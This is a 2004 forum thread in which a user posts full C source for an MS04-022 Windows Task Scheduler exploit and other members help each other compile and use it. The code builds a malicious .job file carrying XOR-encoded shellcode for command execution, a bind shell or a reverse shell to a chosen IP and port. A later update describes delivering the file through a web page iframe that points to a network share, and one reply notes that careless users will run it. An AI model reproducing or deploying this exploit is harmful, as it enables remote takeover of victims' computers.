Ms04-022 Exploit (my Version)

ScriptGod

Jul 26 2004, 05:10 PM

CODE

/***********************************************************************\
* MS04-022 Task Scheduler Exploit *
* by ScriptGod *
* *
* tested against: *
* - Windows XP GER SP0 *
* - Windows XP GER SP1 *
* - Windows 2000 GER SP4 *
* *
* The first instruction that can be controled *
* can only be a few bytes long so I used a short jump *
* to the second jump (the "real) jump whichs jumps then to the payload. * *
* *
* The bad characters which are avoided through the XOR encoder are *
* only GUESSED. Probably these are not all or some of them are wrong. *
* But I haven't had any problem with this set of characters. *
* *
* This Exploits is written for the Explorer.exe. It should work with *
* other applications but not tested - probably you have to change the *
* return address for other applications. *
* *
* The advisor listed Windows 2000 also. But my Windows 2000 doesn't *
* seems to be vulnerable. Maybe other applications or Windows 2000 with *
* installed Internet Explorer 6. *
\***********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#endif

#define OVERFLOW_SIZE 1024

// Job file parts
unsigned char Job_Part1[] =
"\x47\x04\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\x46\x00\xff\xff\x00\x00\x00\x00\x3c\x00\x0a\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0f\x00\x00\x00\x00\x05\x13\x04\x00"
"\x00\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
unsigned char Job_Part2[] =
"\x00\x00\x00\x00\x05\x00\x72\x00\x6f\x00\x6f\x00\x74\x00\x00\x00"
"\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00\x00\x00\x00\x00";

unsigned char Jump[] = "\xeb\xe1"; // jmp short -29
unsigned char Jump2[] = "\xe9\x02\xfe\xff\xff"; // jmp -505
unsigned char Stack[] = "\x66\x81\xec\xd0\x07"; // inc ecx (nop)
// sub sp, 1000
// payload xor decoder
unsigned char Decoder[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x80\xeb\xe9\x31\xc9\x66\x81\xe9\x00"
"\x80\x80\x33\xff\x43\xe2\xfa";
/*
[BITS 32]

; get EIP
fldz
fnstenv [esp-12]
pop ebx
sub bl, -23; to payload

; payload size
xor ecx, ecx
sub cx, -32768

xor_loop:
xor byte [ebx], 0xff
inc ebx
loop xor_loop
*/
#define DECODER_SIZE_OFFSET 15
#define DECODER_XOR_OFFSET 19

#define PAYLOAD_LEN_LIMIT ( 504 - ( sizeof( Stack ) - 1 ) - ( sizeof( Decoder ) - 1 ) )

/* win32_exec - Raw Shellcode [ EXITFUNC=seh CMD= FIXSTACK=1 Size=161 ] http://metasploit.com */
unsigned char Paylaod_WinExec[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff"/*\x00"*/;

/* win32_bind - Raw Shellcode [ EXITFUNC=thread LPORT=4444 Size=375 ] http://metasploit.com */
unsigned char Payload_BindShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
#define BINDSHELL_PORT_OFFSET 236

/* win32_reverse - Raw Shellcode [ EXITFUNC=thread LHOST=127.0.0.1 LPORT=4321 FIXSTACK=1 Size=357 ] http://metasploit.com */
unsigned char Payload_ReverseShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf"
"\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0"
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00"
"\x00\x01\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20"
"\x59\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24"
"\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44"
"\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89"
"\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0"
"\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a"
"\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff\x55\x04"
"\x31\xdb\x53\xff\xd0";
#define REVERSESHELL_IP_OFFSET 222
#define REVERSESHELL_PORT_OFFSET 229

#define PAYLOAD_ID_WINEXEC 0
#define PAYLOAD_ID_BIND 1
#define PAYLOAD_ID_REVERSE 2

typedef struct
{
const char* pszName;
unsigned long nNewEIP;
} Target;
Target Targets[] =
{
{ "Windows XP SP0+1 GER", 0x76e21a21 }, // ACTIVEDS.dll, jmp esp
{ "DoS Windows XP ALL", 0xffffffff },
};

bool CreateJobFile( const char *pszFile, const unsigned char *pApplicationName, unsigned long nApplicationNameLen )
{
unsigned long nJobDataSize;
unsigned char *pJobData;
unsigned long nJobDataPos;

// alloc memory
nJobDataSize = ( sizeof( Job_Part1 ) - 1 ) + sizeof( unsigned short ) + nApplicationNameLen + sizeof( wchar_t ) + ( sizeof( Job_Part2 ) - 1 );
pJobData = (unsigned char*)malloc( nJobDataSize );
if( !pJobData )
{
printf( "[-] out of memory\n" );
return false;
}
// clean
memset( pJobData, 0x00, nJobDataSize );

nJobDataPos = 0;

// add...
// ...first part
memcpy( &pJobData[ nJobDataPos ], Job_Part1, sizeof( Job_Part1 ) - 1 );
nJobDataPos += sizeof( Job_Part1 ) - 1;

//...application name len (string length + NULL-termination wchar)
*(unsigned short*)&pJobData[ nJobDataPos ] = (unsigned short)( ( nApplicationNameLen / sizeof( wchar_t ) ) + 1 );
nJobDataPos += sizeof( unsigned short );

// ...application name
memcpy( &pJobData[ nJobDataPos ], pApplicationName, nApplicationNameLen );
nJobDataPos += nApplicationNameLen;

// ...application name NULL-string-termination wchar
*(wchar_t*)&pJobData[ nJobDataPos ] = 0;
nJobDataPos += sizeof( wchar_t );

// ...second part
memcpy( &pJobData[ nJobDataPos ], Job_Part2, sizeof( Job_Part2 ) - 1 );
nJobDataPos += sizeof( Job_Part2 ) - 1;

// open file
FILE *pOutFile = fopen( pszFile, "wb" );
if( !pOutFile )
{
printf( "[-] couldn't open file\n" );

free( pJobData );
return false;
}

// write
if( fwrite( pJobData, 1, nJobDataSize, pOutFile ) != nJobDataSize )
{
printf( "[-] failed to write to file\n" );

fclose( pOutFile );
free( pJobData );
return false;
}

// clean up
fclose( pOutFile );
free( pJobData );

return true;
}

bool CreateJobFilePayload( const char *pszFile, const unsigned char *pPayload, unsigned long nPayloadLen, unsigned long nEIP )
{
bool bFoundXOR;
unsigned char cXORKey;
unsigned char PayloadXOR[ PAYLOAD_LEN_LIMIT ];
unsigned char ExploitData[ OVERFLOW_SIZE ];
int nExploitDataPos;

// test size rule
if( nPayloadLen > PAYLOAD_LEN_LIMIT )
{
printf( "[-] your payload size of %u exeeds the limit of %u\n", nPayloadLen, PAYLOAD_LEN_LIMIT );
return false;
}

// set up decoder and xor
memset( PayloadXOR, 0x00, sizeof( PayloadXOR ) );

// ...payload size
*(short*)&Decoder[ DECODER_SIZE_OFFSET ] = -( (short)nPayloadLen );

// find xor key
for( cXORKey = 0x01; cXORKey < 0xff; cXORKey++ )
{
bFoundXOR = false;

Decoder[ DECODER_XOR_OFFSET ] = cXORKey;
for( unsigned long n = 0; n < nPayloadLen; n++ )
{
PayloadXOR[ n ] = pPayload[ n ] ^ cXORKey;

// bad chars (I don't know if this is correct! - these chars are guessed!!!)
if( (char)PayloadXOR[ n ] == '\x00' ||
(char)PayloadXOR[ n ] == '\x0a' ||
(char)PayloadXOR[ n ] == '\x0d' ||
(char)PayloadXOR[ n ] == '\x25' ||
(char)PayloadXOR[ n ] == '\x26' ||
(char)PayloadXOR[ n ] == '\x3d' ||
(char)PayloadXOR[ n ] == '\x3f' ||
(char)PayloadXOR[ n ] == '\x40' ||
(char)PayloadXOR[ n ] == '\xfe' ||
(char)PayloadXOR[ n ] == '\xff' )
{
bFoundXOR = false;
break;
}
else
bFoundXOR = true;

}

// found?
if( bFoundXOR )
break;
}
if( !bFoundXOR )
{
printf( "[-] couldn't find an suitable xor key\n" );
return false;
}

// fill with NOPs (using inc ecx instead of nop)
memset( ExploitData, 0x41, sizeof( ExploitData ) );

// set up exploits data
nExploitDataPos = 0;

// ...add stack "alloc"
memcpy( &ExploitData[ nExploitDataPos ], Stack, sizeof( Stack ) - 1 );
nExploitDataPos += sizeof( Stack ) - 1;

// ...add decoder
memcpy( &ExploitData[ nExploitDataPos ], Decoder, sizeof( Decoder ) - 1 );
nExploitDataPos += sizeof( Decoder ) - 1;

// ...add payload
memcpy( &ExploitData[ nExploitDataPos ], PayloadXOR, nPayloadLen );
nExploitDataPos += nPayloadLen;

// ...new EIP
*(unsigned long*)&ExploitData[ 518 ] = nEIP;

// ...add jump backward (first jump)
memcpy( &ExploitData[ 534 ], Jump, sizeof( Jump ) - 1 );

// ...add jump backward (second jump)
memcpy( &ExploitData[ 505 ], Jump2, sizeof( Jump2 ) - 1 );

return CreateJobFile( pszFile, ExploitData, sizeof( ExploitData ) );
}

void usage( const char *argv0 )
{
int n;

printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );

printf( "\n" );

// TargetIDs
printf( "%-8s %-35s %s\n", "TargetID", "Name", "EIP" );
printf( "----------------------------------------------------------\n" );
for( n = 0; n < sizeof( Targets ) / sizeof( Target ); n++ )
printf( "%-8i %-35s 0x%08x\n", n, Targets[ n ].pszName, Targets[ n ].nNewEIP );

printf( "\n" );

// PayloadIDs
printf( "%-9s %s\n", "PayloadID", "Name" );
printf( "--------------------------\n" );
printf( "%-9i %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
printf( "%-9i %s\n", PAYLOAD_ID_BIND, "BindShell" );
printf( "%-9i %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}

int main( int argc, char **argv )
{
int nTargetID;
int nPayloadID;
char *pszJobFile;
unsigned int nWinExecSize;
unsigned char *pWinExec;
unsigned short nPort;
unsigned long nIP;
bool bCreated;

// banner
printf( "+----------------------------------+\n" );
printf( "| MS04-022 Task Scheduler Exploits |\n" );
printf( "| (for Explorer.exe) |\n" );
printf( "| |\n" );
printf( "| by ScriptGod |\n" );
printf( "+----------------------------------+\n" );
printf( "| version of 24.07.04 |\n" );
printf( "+----------------------------------+\n" );

// get parameter
if( argc < 5 )
{
usage( argv[ 0 ] );
return 0;
}
nTargetID = atoi( argv[ 1 ] );
nPayloadID = atoi( argv[ 2 ] );
pszJobFile = argv[ 3 ];
if( nTargetID >= sizeof( Targets ) / sizeof( Target ) || nPayloadID >= 3 ||
( nPayloadID == PAYLOAD_ID_REVERSE && argc < 6 ) )
{
usage( argv[ 0 ] );
return 0;
}

// user info
printf( "[+] creating for Target '%s' with ", Targets[ nTargetID ].pszName );

// create
bCreated = false;
if( nPayloadID == PAYLOAD_ID_WINEXEC )
{
printf( "WinExec payload\n" );
printf( "[+] command: %s\n", argv[ 4 ] );

// build payload
nWinExecSize = ( sizeof( Paylaod_WinExec ) - 1 ) + ( strlen( argv[ 4 ] ) + 1 );
pWinExec = (unsigned char*)malloc( nWinExecSize );
if( !pWinExec )
{
printf( "[-] out of memory\n" );
return 0;
}
memset( pWinExec, 0x00, nWinExecSize );
memcpy( pWinExec, Paylaod_WinExec, sizeof( Paylaod_WinExec ) - 1 );
strcpy( (char*)&pWinExec[ sizeof( Paylaod_WinExec ) - 1 ], argv[ 4 ] );

bCreated = CreateJobFilePayload( pszJobFile, pWinExec, nWinExecSize, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_BIND )
{
printf( "BindShell payload\n" );

// info
nPort = (unsigned short)atoi( argv[ 4 ] );
printf( "[+] port: %i\n", nPort );

// change byte order
nPort = htons( nPort );

// set
*(unsigned short*)&Payload_BindShell[ BINDSHELL_PORT_OFFSET ] = nPort;

// create
bCreated = CreateJobFilePayload( pszJobFile, Payload_BindShell, sizeof( Payload_BindShell ) - 1, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_REVERSE )
{
printf( "ReverseShell payload\n" );

// info
nIP = inet_addr( argv[ 4 ] );
nPort = (unsigned short)atoi( argv[ 5 ] );
printf( "[+] connect to: %s:%i\n", argv[ 4 ], nPort );

// change byte order
nPort = htons( nPort );

// set
*(unsigned long*)&Payload_ReverseShell[ REVERSESHELL_IP_OFFSET ] = nIP;
*(unsigned short*)&Payload_ReverseShell[ REVERSESHELL_PORT_OFFSET ] = nPort;

// create
bCreated = CreateJobFilePayload( pszJobFile, Payload_ReverseShell, sizeof( Payload_ReverseShell ) - 1, Targets[ nTargetID ].nNewEIP );
}

// user info
if( bCreated )
printf( "[+] job file '%s' created\n", pszJobFile );
else
printf( "[-] job file creation failed\n" );

return 0;
}

Nostremato

Jul 26 2004, 06:05 PM

i can´t compile it

got many errors...
i would test this exploit but so i can´t

ScriptGod

Jul 26 2004, 06:07 PM

QUOTE (Nostremato @ Jul 26 2004, 06:05 PM)

i can´t compile it

got many errors...
i would test this exploit but so i can´t

can you post this errors?

Nostremato

Jul 26 2004, 06:08 PM

QUOTE

explorer.c:162: error: syntax error before "CreateJobFile"
explorer.c: In function `CreateJobFile':
explorer.c:174: error: `false' undeclared (first use in this function)
explorer.c:174: error: (Each undeclared identifier is reported only once
explorer.c:174: error: for each function it appears in.)
explorer.c:226: error: `true' undeclared (first use in this function)
explorer.c: At top level:
explorer.c:229: error: syntax error before "CreateJobFilePayload"
explorer.c: In function `CreateJobFilePayload':
explorer.c:231: error: `bool' undeclared (first use in this function)
explorer.c:231: error: syntax error before "bFoundXOR"
explorer.c:241: error: `false' undeclared (first use in this function)
explorer.c:253: error: `bFoundXOR' undeclared (first use in this function)
explorer.c:256: error: `for' loop initial declaration used outside C99 mode
explorer.c:276: error: `true' undeclared (first use in this function)
explorer.c: In function `main':
explorer.c:353: error: `bool' undeclared (first use in this function)
explorer.c:353: error: syntax error before "bCreated"
explorer.c:385: error: `bCreated' undeclared (first use in this function)
explorer.c:385: error: `false' undeclared (first use in this function)
explorer.c:449:2: warning: no newline at end of file

ScriptGod

Jul 26 2004, 06:15 PM

QUOTE (Nostremato @ Jul 26 2004, 06:08 PM)

QUOTE

explorer.c:162: error: syntax error before "CreateJobFile"
explorer.c: In function `CreateJobFile':
explorer.c:174: error: `false' undeclared (first use in this function)
explorer.c:174: error: (Each undeclared identifier is reported only once
explorer.c:174: error: for each function it appears in.)
explorer.c:226: error: `true' undeclared (first use in this function)
explorer.c: At top level:
explorer.c:229: error: syntax error before "CreateJobFilePayload"
explorer.c: In function `CreateJobFilePayload':
explorer.c:231: error: `bool' undeclared (first use in this function)
explorer.c:231: error: syntax error before "bFoundXOR"
explorer.c:241: error: `false' undeclared (first use in this function)
explorer.c:253: error: `bFoundXOR' undeclared (first use in this function)
explorer.c:256: error: `for' loop initial declaration used outside C99 mode
explorer.c:276: error: `true' undeclared (first use in this function)
explorer.c: In function `main':
explorer.c:353: error: `bool' undeclared (first use in this function)
explorer.c:353: error: syntax error before "bCreated"
explorer.c:385: error: `bCreated' undeclared (first use in this function)
explorer.c:385: error: `false' undeclared (first use in this function)
explorer.c:449:2: warning: no newline at end of file

name the file .cpp

bool is a C++ data type, but no C date type

Nostremato

Jul 26 2004, 06:19 PM

I tried it with .cpp but got still errors

CODE

explorer.cpp: In function `int main(int, char**)':
explorer.cpp:414: error: `htons' undeclared (first use this function)
explorer.cpp:414: error: (Each undeclared identifier is reported only once for
each function it appears in.)
explorer.cpp:427: error: `inet_addr' undeclared (first use this function)
explorer.cpp:449:2: warning: no newline at end of file

ScriptGod

Jul 26 2004, 06:25 PM

QUOTE (Nostremato @ Jul 26 2004, 06:19 PM)

I tried it with .cpp but got still errors

CODE

explorer.cpp: In function `int main(int, char**)':
explorer.cpp:414: error: `htons' undeclared (first use this function)
explorer.cpp:414: error: (Each undeclared identifier is reported only once for
each function it appears in.)
explorer.cpp:427: error: `inet_addr' undeclared (first use this function)
explorer.cpp:449:2: warning: no newline at end of file

hmm, then change the lines

CODE

#ifdef WIN32
#include <winsock.h>
#endif

to

CODE

#include <winsock.h>

Nostremato

Jul 26 2004, 06:43 PM

QUOTE

In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types. This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status

thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

=k3Rn=

Jul 26 2004, 06:54 PM

this new expoit seems to be really intresting, could someone perhaps modify it so that it spawn a shell ?!

this would be a great new attack then - wouldn't it?
as far as i know all windows systems are vulnarable and task sceduler is automatically turned on.

Nostremato

Jul 26 2004, 06:57 PM

BindShell & ReverseShell Code are already in the Code...
thats why it is the modded version by scriptgod

=k3Rn=

Jul 26 2004, 07:04 PM

hm so does it already works?
i haven't compiled it yet ...

Nostremato

Jul 26 2004, 07:08 PM

the sploit seems to be quiet good but i can´t test because i´m to stupid to compile it

ScriptGod

Jul 26 2004, 07:09 PM

QUOTE (Nostremato @ Jul 26 2004, 06:43 PM)

QUOTE

In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types. This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status

thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

you must link wsock32 or ws2_32... How to do this depends on your compiler...
try to add
[code]
#pragma comment( lib, "wsock32.lib" )
[code]
in the code

this exploit its not modded. its completly self written

well, this bug cann't be accessed remotly without user interactivity

Nostremato

Jul 26 2004, 07:12 PM

i´m sorry that i said it´s modded ...

Hellraiseruk

Jul 26 2004, 09:31 PM

maybe someone can compile it and post it? nice code by the way ScriptGod

xlulux

Jul 26 2004, 09:54 PM

i compiled it,but im not gonna upload it. if you have compiled and gotten the syntax right lemme know what the diffrent commands do

=k3Rn=

Jul 27 2004, 02:33 AM

i get the folowing errors when creating exe file:

Linker-Vorgang läuft...
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _inet_addr@4
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _htons@4
Debug/04-022.exe : fatal error LNK1120: 2 unaufgeloeste externe Verweise
Fehler beim Ausführen von link.exe.

and could you pls give me a hint how you can use it then - sorry for that lame question, but i don't find it obvious.

nuorder

Jul 27 2004, 02:38 AM

nice work ScriptGod, compiles fine

mortello

Jul 27 2004, 03:03 AM

QUOTE (=k3Rn= @ Jul 27 2004, 02:33 AM)

i get the folowing errors when creating exe file:

Linker-Vorgang läuft...
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _inet_addr@4
04-022.obj : error LNK2001: Nichtaufgeloestes externes Symbol _htons@4
Debug/04-022.exe : fatal error LNK1120: 2 unaufgeloeste externe Verweise
Fehler beim Ausführen von link.exe.

and could you pls give me a hint how you can use it then - sorry for that lame question, but i don't find it obvious.

what compiler do you use dude ?

mortello

Jul 27 2004, 03:05 AM

QUOTE (ScriptGod @ Jul 26 2004, 07:09 PM)

QUOTE (Nostremato @ Jul 26 2004, 06:43 PM)

QUOTE

In file included from explorer.cpp:30:
/usr/include/w32api/winsock.h:81:2: warning: #warning "fd_set and associated mac
ros have been defined in sys/types. This can cause runtime problems with W3
2 sockets"

explorer.cpp: undefined reference to `_htons@4'
explorer.cpp: undefined reference to `_inet_addr@4'
explorer.cpp: undefined reference to `_htons@4'
collect2: ld returned 1 exit status

thx for help scriptgod but i couldn´t compile it anyway...
It would be nice if somebody could share it for me

you must link wsock32 or ws2_32... How to do this depends on your compiler...
try to add
[code]
#pragma comment( lib, "wsock32.lib" )
[code]
in the code

this exploit its not modded. its completly self written

well, this bug cann't be accessed remotly without user interactivity

But still, there are lots of people really stupid who will run it for you....

that and other similar local exploit....

so it can be really helpful

Krogoth

Jul 27 2004, 07:10 AM

it works fine if you include the statement below, as indicated by ScriptGod.
i'm using MS Visual C++.

#pragma comment (lib,"ws2_32")

passi

Jul 27 2004, 09:45 AM

QUOTE (nuorder @ Jul 27 2004, 02:38 AM)

nice work ScriptGod, compiles fine

Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version?

studnikov

Jul 27 2004, 09:59 AM

i posted it in the files section

CODE

Compiling...
MS04-022ScriptGod.cpp

MS04-022ScriptGod.obj - 0 error(s), 0 warning(s)

Linking...

MS04-022ScriptGod.exe - 0 error(s), 0 warning(s)

http://www.governmentsecurity.org/forum/in...ST&f=19&t=10342

The Storm

Jul 27 2004, 10:15 AM

thank ya for compiling the exploit and uploading it!

ivan288

Jul 27 2004, 11:26 AM

i compiled it myself, but not sure what the correct syntax is.
any help?

twistedps

Jul 27 2004, 05:34 PM

i dont see what you guys dont get heh..

CODE

void usage( const char *argv0 )
{
int n;

printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );

printf( "\n" );

// TargetIDs
printf( "%-8s %-35s %s\n", "TargetID", "Name", "EIP" );
printf( "----------------------------------------------------------\n" );
for( n = 0; n < sizeof( Targets ) / sizeof( Target ); n++ )
printf( "%-8i %-35s 0x%08x\n", n, Targets[ n ].pszName, Targets[ n ].nNewEIP );

printf( "\n" );

// PayloadIDs
printf( "%-9s %s\n", "PayloadID", "Name" );
printf( "--------------------------\n" );
printf( "%-9i %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
printf( "%-9i %s\n", PAYLOAD_ID_BIND, "BindShell" );
printf( "%-9i %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}

tibbar

Jul 28 2004, 07:28 AM

i'm sorry but if you cant compile this you must be really STUPID.

oh and passiw im sure you know the policy here about compile requests...

QUOTE: "Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version? "

Well, it took me about 2 minutes to set up a project in vc6, paste the code in and compile it.

Here's the executable.

globey

Jul 28 2004, 08:47 AM

tnx for this code i try it out

nuorder

Jul 28 2004, 09:31 AM

QUOTE (passiw @ Jul 27 2004, 07:45 PM)

QUOTE (nuorder @ Jul 27 2004, 02:38 AM)

nice work ScriptGod, compiles fine

Oh my god. I can't believe that! This [zensored] can compile it without errors and does not post it here. Very friendly...

ScriptGod: nice work, why can't YOU just upload the compiled version?

i followed all the steps posted here, if you can read and learn you will be able to compile this with no problems at all in less than a minute

if you do encounter errors while compiling im sure members would be happy to help you out, just post the error

realmasterX

Jul 29 2004, 01:20 PM

QUOTE (Hellraiseruk @ Jul 26 2004, 09:31 PM)

maybe someone can compile it and post it? nice code by the way ScriptGod

would be nice,..
im not able to compile it,...

brainbuster

Jul 29 2004, 02:26 PM

worked nice 4 me after i added
#pragma comment( lib, "wsock32.lib" )

thx 4 sharin

ScriptGod

Jul 31 2004, 03:30 PM

update

CODE

/***********************************************************************\
* MS04-022 Task Scheduler Exploit *
* by ScriptGod *
* *
* tested against: *
* - Windows XP GER SP0 *
* - Windows XP GER SP1 *
* - Windows 2000 GER SP4 *
* *
* tested with: *
* - Explorer.exe *
* - IExplorer.exe *
* *
* The first instruction that can be controled can only be a few bytes *
* long so I used a short jump to the second jump (the "real) jump *
* whichs jumps then to the payload. *
* *
* The bad characters which are avoided through the XOR encoder are *
* only GUESSED. Probably these are not all or some of them are wrong. *
* But I haven't had any problem with this set of characters. *
* *
* The advisor listed Windows 2000 also. But my Windows 2000 doesn't *
* seems to be vulnerable. Maybe other applications or Windows 2000 with *
* installed Internet Explorer 6. *
* *
* To use this in a webpage you must create a html file with a iframe to *
* a share which contains the .job file. *
* example: *
* *
* <html> *
* <body> *
* <iframe src="\\192.168.0.1\Job"> *
* </body> *
* </html> *
* *
* THX to www.metasploit.com for their payloads *
\***********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>

// for Microsoft Visual C++
#ifdef _MSC_VER
#pragma comment(lib,"ws2_32")
#endif
#endif

#define OVERFLOW_SIZE 1024

// Job file parts
unsigned char Job_Part1[] =
"\x47\x04\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
